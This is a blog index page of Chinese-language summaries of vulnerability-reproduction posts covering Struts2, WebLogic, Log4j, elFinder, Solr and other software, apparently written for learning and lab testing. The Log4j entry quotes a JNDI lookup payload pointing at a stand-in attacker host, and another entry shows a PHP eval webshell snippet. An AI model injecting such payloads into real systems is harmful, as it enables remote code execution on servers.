摘要:
学习于:https://www.cnblogs.com/HelloCTF/p/13044403.html 序列化和反序列化的概念 序列化就是将对象转换成字符串。字符串包括、属性名、属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。对象的序列化利于对象的保存和传输,也可以让多个 阅读全文
摘要:
GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 参考链接: https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/https://www.lea 阅读全文
摘要:
elFinder是一个基于PHP、Jquery的开源文件管理系统。 在elFinder 2.1.48及以前的版本中,存在一处参数注入漏洞。攻击者可以利用这个漏洞在目标服务器上执行任意命令,即使是最小化安装的elFinder。 这个漏洞的原因除了参数注入外,还有默认情况下的未授权访问,因此我们可以对e 阅读全文
摘要:
原理 详见https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html。 测试环境搭建 直接执行docker-compose up -d即可运行测试环境,环境监听9000端口。 EXP Exp见 https://gist.github 阅读全文
摘要:
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerService 阅读全文
摘要:
jre版本:openjdk:8-jre elasticsearch版本:v1.6.0 影响版本:1.6.1以下 原理 参考文章 https://www.exploit-db.com/exploits/38383/http://www.freebuf.com/vuls/99942.html 说明: e 阅读全文
摘要:
学习于:https://blog.csdn.net/qq_38154820/article/details/106330032 概述 开始之前先明确什么是WebShell客户端?先问个问题,什么是客户端,什么是服务端? 很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果 阅读全文
摘要:
面向对象中的基本概念 类和对象 对象: 万物皆对象; 类: 任何对象,都可以人为“规定”为某种类型(类别); class Person{ var $name ; var $age; var $edu; } 我: 姓名:罗XX, 年龄40, 学历:大学; 王亮: 姓名:王亮 年龄:20; 学历:大学; 阅读全文
摘要:
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/tec 阅读全文
摘要:
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryIm 阅读全文
摘要:
Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验。在Apache Unomi 1.5.1级以前版本中,存在一处表达式注入漏洞,远程攻击者通过MVEL和OGNL表达式即可在目 阅读全文
摘要:
http是超文本传输协议,信息是明文传输, https则具安全性的ssl/tls加密传输协议。 http和https使用完全不同的连接方法和不同的端口。前者是80,后者是443。http连接是非常简单和无状态的;httpS协议是由SSL/TLS+HTTP协议构建的网络协议,可用于加密传输和身份认证。 阅读全文
摘要:
什么是UDF UDF 全称为:User Defined Function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++ 阅读全文
摘要:
eval()函数和system()函数的比较 eval类型函数是代码执行而不是命令执行(一句话木马) system类型函数是命令执行而不是代码执行 eval函数里必须是一个符合php语法的语句,如果语句结尾没有分号会报错:eval()'d code <?php eval("echo 1+1;"); 阅读全文
摘要:
影响版本: 2.0.0 - 2.3.15 漏洞详情: http://struts.apache.org/docs/s2-016.htmlhttp://www.freebuf.com/articles/web/25337.html 测试环境搭建 docker-compose build docker- 阅读全文
摘要:
影响版本: 2.1.0 - 2.3.1 漏洞详情: http://struts.apache.org/docs/s2-008.html 测试环境搭建 docker-compose build docker-compose up -d 原理 参考:http://rickgray.me/2016/05/ 阅读全文
摘要:
漏洞原理与分析可以参考: https://www.exploit-db.com/exploits/43009/https://paper.seebug.org/425/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Luce 阅读全文
摘要:
影响版本: 2.0.0 - 2.3.32 漏洞详情: http://struts.apache.org/docs/s2-048.htmlhttp://bobao.360.cn/learning/detail/4078.htmlhttp://xxlegend.com/2017/07/08/S2-048 阅读全文
摘要:
scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接:https://www.leavesongs.com/PENETRATION/attack-scra 阅读全文
摘要:
Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考链接 阅读全文